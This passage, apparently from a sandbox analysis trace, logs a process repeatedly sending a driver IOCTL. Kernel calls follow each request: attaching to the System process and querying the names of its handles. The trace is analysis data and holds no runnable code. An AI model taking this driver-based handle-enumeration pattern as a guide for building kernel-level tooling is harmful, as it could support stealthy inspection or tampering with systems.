ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.190] ObfDereferenceObject (Object=0xfffffa8011951f20) returned 0x1 [0240.190] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.190] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.190] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.190] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0240.190] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.190] PsAcquireProcessExitSynchronization () returned 0x0 [0240.190] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.190] ObReferenceObjectByHandle (in: Handle=0xffffffff800001cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003442b90, HandleInformation=0x0) returned 0x0 [0240.190] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.190] PsReleaseProcessExitSynchronization () returned 0x2 [0240.190] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.190] ObQueryNameString (in: Object=0xfffffa8003442b90, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.190] ObfDereferenceObject (Object=0xfffffa8003442b90) returned 0x2 [0240.190] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.190] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.190] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.191] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0240.191] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.191] PsAcquireProcessExitSynchronization () returned 0x0 [0240.191] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.191] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800343f570, HandleInformation=0x0) returned 0x0 [0240.191] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.410] PsReleaseProcessExitSynchronization () returned 0x2 [0240.410] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.410] ObQueryNameString (in: Object=0xfffffa800343f570, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.410] ObfDereferenceObject (Object=0xfffffa800343f570) returned 0x2 [0240.410] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.410] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.410] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0240.410] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.410] PsAcquireProcessExitSynchronization () returned 0x0 [0240.410] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.410] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003436240, HandleInformation=0x0) returned 0x0 [0240.410] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.410] PsReleaseProcessExitSynchronization () returned 0x2 [0240.410] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.410] ObQueryNameString (in: Object=0xfffffa8003436240, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.410] ObfDereferenceObject (Object=0xfffffa8003436240) returned 0x2 [0240.410] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.410] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.411] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.411] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.411] PsAcquireProcessExitSynchronization () returned 0x0 [0240.411] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.411] ObReferenceObjectByHandle (in: Handle=0xffffffff800001dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003434bf0, HandleInformation=0x0) returned 0x0 [0240.411] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.411] PsReleaseProcessExitSynchronization () returned 0x2 [0240.411] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.411] ObQueryNameString (in: Object=0xfffffa8003434bf0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.411] ObfDereferenceObject (Object=0xfffffa8003434bf0) returned 0x1 [0240.411] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.411] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.411] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.411] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.411] PsAcquireProcessExitSynchronization () returned 0x0 [0240.411] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.411] ObReferenceObjectByHandle (in: Handle=0xffffffff800001e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003441aa0, HandleInformation=0x0) returned 0x0 [0240.411] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.411] PsReleaseProcessExitSynchronization () returned 0x2 [0240.411] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.411] ObQueryNameString (in: Object=0xfffffa8003441aa0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.411] ObfDereferenceObject (Object=0xfffffa8003441aa0) returned 0x2 [0240.412] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.412] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.412] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.412] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.412] PsAcquireProcessExitSynchronization () returned 0x0 [0240.412] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.412] ObReferenceObjectByHandle (in: Handle=0xffffffff800001ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80035257d0, HandleInformation=0x0) returned 0x0 [0240.412] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.412] PsReleaseProcessExitSynchronization () returned 0x2 [0240.412] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.412] ObQueryNameString (in: Object=0xfffffa80035257d0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.412] ObfDereferenceObject (Object=0xfffffa80035257d0) returned 0x2 [0240.412] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.412] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.412] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0240.412] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.412] PsAcquireProcessExitSynchronization () returned 0x0 [0240.412] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.412] ObReferenceObjectByHandle (in: Handle=0xffffffff800001f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800352a560, HandleInformation=0x0) returned 0x0 [0240.412] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.413] PsReleaseProcessExitSynchronization () returned 0x2 [0240.413] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.413] ObQueryNameString (in: Object=0xfffffa800352a560, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.413] ObfDereferenceObject (Object=0xfffffa800352a560) returned 0x1 [0240.413] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.413] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.413] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0240.413] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.413] PsAcquireProcessExitSynchronization () returned 0x0 [0240.413] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.413] ObReferenceObjectByHandle (in: Handle=0xffffffff800001fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800349f2b0, HandleInformation=0x0) returned 0x0 [0240.413] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.413] PsReleaseProcessExitSynchronization () returned 0x2 [0240.413] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.413] ObQueryNameString (in: Object=0xfffffa800349f2b0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.413] ObfDereferenceObject (Object=0xfffffa800349f2b0) returned 0x1 [0240.413] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.413] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.414] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0240.414] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.414] PsAcquireProcessExitSynchronization () returned 0x0 [0240.414] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.414] ObReferenceObjectByHandle (in: Handle=0xffffffff80000200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800352a690, HandleInformation=0x0) returned 0x0 [0240.414] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.414] PsReleaseProcessExitSynchronization () returned 0x2 [0240.414] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.414] ObQueryNameString (in: Object=0xfffffa800352a690, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.414] ObfDereferenceObject (Object=0xfffffa800352a690) returned 0x1 [0240.414] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.414] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.414] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0240.414] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.414] PsAcquireProcessExitSynchronization () returned 0x0 [0240.414] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.414] ObReferenceObjectByHandle (in: Handle=0xffffffff80000204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800352af20, HandleInformation=0x0) returned 0x0 [0240.414] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.415] PsReleaseProcessExitSynchronization () returned 0x2 [0240.415] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.415] ObQueryNameString (in: Object=0xfffffa800352af20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.415] ObfDereferenceObject (Object=0xfffffa800352af20) returned 0x1 [0240.415] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.415] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.415] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.415] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.415] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.415] PsAcquireProcessExitSynchronization () returned 0x0 [0240.415] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.415] ObReferenceObjectByHandle (in: Handle=0xffffffff80000208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003547d40, HandleInformation=0x0) returned 0x0 [0240.415] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.415] PsReleaseProcessExitSynchronization () returned 0x2 [0240.415] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.415] ObQueryNameString (in: Object=0xfffffa8003547d40, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.415] ObfDereferenceObject (Object=0xfffffa8003547d40) returned 0x11 [0240.415] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.415] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.416] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.416] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0240.416] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.416] PsAcquireProcessExitSynchronization () returned 0x0 [0240.416] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.416] ObReferenceObjectByHandle (in: Handle=0xffffffff80000224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003560f20, HandleInformation=0x0) returned 0x0 [0240.416] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.416] PsReleaseProcessExitSynchronization () returned 0x2 [0240.416] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.416] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.416] ObfDereferenceObject (Object=0xfffffa8003560f20) returned 0x1 [0240.416] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.416] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.416] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.416] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xc2, lpOverlapped=0x0) returned 1 [0240.416] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.416] PsAcquireProcessExitSynchronization () returned 0x0 [0240.416] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.416] ObReferenceObjectByHandle (in: Handle=0xffffffff80000234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80035605a0, HandleInformation=0x0) returned 0x0 [0240.416] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.419] PsReleaseProcessExitSynchronization () returned 0x2 [0240.419] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.420] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.420] ObfDereferenceObject (Object=0xfffffa80035605a0) returned 0x1 [0240.420] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.420] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.420] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0240.420] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.420] PsAcquireProcessExitSynchronization () returned 0x0 [0240.420] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.420] ObReferenceObjectByHandle (in: Handle=0xffffffff80000238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003563520, HandleInformation=0x0) returned 0x0 [0240.420] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.420] PsReleaseProcessExitSynchronization () returned 0x2 [0240.420] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.420] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.420] ObfDereferenceObject (Object=0xfffffa8003563520) returned 0x1 [0240.420] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.420] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.420] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0240.420] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.421] PsAcquireProcessExitSynchronization () returned 0x0 [0240.421] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.421] ObReferenceObjectByHandle (in: Handle=0xffffffff80000240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003562770, HandleInformation=0x0) returned 0x0 [0240.421] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.421] PsReleaseProcessExitSynchronization () returned 0x2 [0240.421] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.421] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.421] ObfDereferenceObject (Object=0xfffffa8003562770) returned 0x21 [0240.421] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.421] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.421] 